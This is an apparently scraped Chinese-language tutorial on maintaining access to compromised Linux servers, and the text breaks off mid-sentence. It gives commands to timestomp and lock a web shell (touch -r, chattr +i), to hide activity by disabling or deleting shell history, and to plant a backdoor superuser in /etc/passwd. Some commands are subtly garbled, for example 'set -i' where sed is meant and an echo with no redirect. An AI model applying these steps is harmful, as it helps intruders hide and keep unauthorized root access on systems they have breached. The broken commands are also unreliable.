Liunx权限维持 详细操作步骤.pdfVIP

Liunx权限维持 权限维持是一项必要且需要得技巧，当在外网中打点后，需要保证点的持久性，使团队能够专注于目 标，而不会失去指挥和控制服务器的通信。 隐藏技巧 修改文件/终端属性 最常用的手段便是修改文件的生成时间，这里可以利用以下命令来进行修改 touch -r index.php shell.php touch命令用于修改文件或者目录的时间属性，包括存取时间和更改时间。若文件不存在，系统会建立 一个新的文件。 文件锁定 在Linux中，使用chattr命令来防止root和其他管理用户误删除和修改重要文件以及目录，此权限是用ls - l查看不出来的。 chattr +i evil.php #锁定文件 rm -rf evil.php #提示禁止删除文件 lsattr evil.php #属性查看 chattr -i evil.php #解除锁定 rm -rf evil.php #彻底删除文件 历史操作命令 在shell中执行的命令，不希望被记录在命令行历史中，就可以使用无痕操作模式 只针对你的工作关闭历史记录 [space]set +o history #备注：[space]表示空格。并且由于空格的原因，该命令本身也不会被记录。 上面的命令会临时禁用历史功能，这意味着在命令之后执行的所有操作都不会记录到历史中，然而这个 命令之前的所有东西都会原样记录在历史列表中。 要重新开始历史功能，执行下面的命令 [space]set -o history #将环境恢复原状 从历史中删除指定的命令 假设历史中已经记录了一些你不希望记录的命令。这种情况下可以通过以下命令来删除 history | grep keyword 输出了历史记录中匹配的命令，每一条前面会有个数字。从历史记录中删除那个指定的项： history -d [num] 删除大规模历史操作记录，这里，我们只保留前150行 set -i 150,$d .bash_history 添加用户 passwd写入 /etc/passwd各部分含义 用户名：密码：用户id：组id：身份描述：用户的家目录：用户登录后所使用的shell /etc/shadow各部分含义： 用户名：密码的md5加密值：自系统使用以来口令被修改的天数：口令的最小修改间隔：口令更改的周期：口 令失效的周期：口令失效以后账户会被锁定多少天：用户账号到期时间：保留字段尚未使用。 写入举例： 1.增加超级用户 $echo momaek:savbSWc4rx8NY :hacker:/root:/bin/bash /etc/passwd 一些系统中，存放着加密后的用户口令字。虽然这个字段存放的只是用户口令的加密串，不是明文，但 是由于/etc/passwd文件对所有用户都可读，所以这仍是一个安全隐患。因此，现在许多Linux系统都使 用了shadow技术，把真正加密后的用户口令字段存放到/etc/shadow文件中，而在/etc/passwd文件的 口令字段中只存放了